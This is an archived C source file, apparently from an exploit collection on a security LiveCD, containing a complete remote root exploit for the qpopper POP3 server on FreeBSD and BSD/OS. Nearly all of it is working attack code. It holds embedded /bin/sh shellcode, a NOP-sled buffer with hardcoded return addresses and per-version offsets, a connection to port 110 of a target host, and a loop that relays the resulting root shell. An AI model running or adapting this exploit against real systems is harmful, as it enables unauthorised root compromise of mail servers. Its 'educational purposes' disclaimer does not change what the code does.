home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / qpopper / bsd-qpopper.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  3KB  |  99 lines

---

1. /*
2.  *      QPOPPER - remote root exploit
3.  *      by Miroslaw Grzybek <mig@zeus.polsl.gliwice.pl>
4.  *
5.  *              - tested against: FreeBSD 3.0
6.  *                                FreeBSD 2.2.x
7.  *                                BSDI BSD/OS 2.1
8.  *              - offsets: FreeBSD with qpopper 2.3 - 2.4    0
9.  *                         FreeBSD with qpopper 2.1.4-R3     900
10.  *                         BSD/OS  with qpopper 2.1.4-R3     1500
11.  *
12.  *      this is for EDUCATIONAL purposes ONLY
13.  */
14.  
15. #include        <stdio.h>
16. #include        <stdlib.h>
17. #include        <sys/time.h>
18. #include        <sys/types.h>
19. #include        <unistd.h>
20. #include        <sys/socket.h>
21. #include        <netinet/in.h>
22. #include        <netdb.h>
23.  
24. #include        <sys/errno.h>
25.  
26. char *shell="\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
27.             "\x88\x5e\x1c\x8d\x1e\x89\x5e\x0e\x31\xc0\xb0\x3b\x8d\x7e"
28.             "\x0e\x89\xfa\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
29.             "\xcf\xeb\x01\xff\x62\x61\x63\x60\xeb\x1b\xe8\xc9\xff\xff"
30.             "\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb"
31.             "\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";
32.  
33. #define ADDR 0xefbfd504
34. #define OFFSET 0
35. #define BUFLEN 1200
36.  
37. char    buf[BUFLEN];
38. int     offset=OFFSET;
39.  
40. int     sock;
41. struct  sockaddr_in sa;
42. struct  hostent *hp;
43.  
44. void main (int argc, char *argv[]) {
45.         int i;
46.  
47.         if(argc<2) {
48.                 printf("Usage: %s <IP | HOSTNAME> [offset]\n",argv[0]);
49.                 exit(0);
50.         }
51.         if(argc>2)
52.                 offset=atoi(argv[2]);
53.  
54.         /* Prepare buffer */
55.         memset(buf,0x90,BUFLEN);
56.         memcpy(buf+800,shell,strlen(shell));
57.         for(i=901;i<BUFLEN-4;i+=4)
58.                 *(int *)&buf[i]=ADDR+offset;
59.         buf[BUFLEN]='\n';
60.  
61.         /* Resolve remote hostname & connect*/
62.         if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
63.                 perror("gethostbyname()");
64.                 exit(0);
65.         }
66.  
67.         if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
68.                 perror("socket()");
69.                 exit(0);
70.         }
71.         sa.sin_family=AF_INET;
72.         sa.sin_port=htons(110);
73.         memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
74.         if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
75.                 perror("connect()");
76.                 exit(0);
77.         }
78.         printf("CONNECTED TO %s... SENDING DATA\n",argv[1]); fflush(stdout);
79.         /* Write evil data */
80.         write(sock,buf,strlen(buf));
81.  
82.         /* Enjoy root shell ;) */
83.         while(1) {
84.                 fd_set input;
85.  
86.                 FD_SET(0,&input);
87.                 FD_SET(sock,&input);
88.                 if((select(sock+1,&input,NULL,NULL,NULL))<0) {
89.                         if(errno==EINTR) continue;
90.                         printf("CONNECTION CLOSED...\n"); fflush(stdout);
91.                         exit(1);
92.                 }
93.                 if(FD_ISSET(sock,&input))
94.                         write(1,buf,read(sock,buf,BUFLEN));
95.                 if(FD_ISSET(0,&input))
96.                         write(sock,buf,read(0,buf,BUFLEN));
97.         }
98. }
99.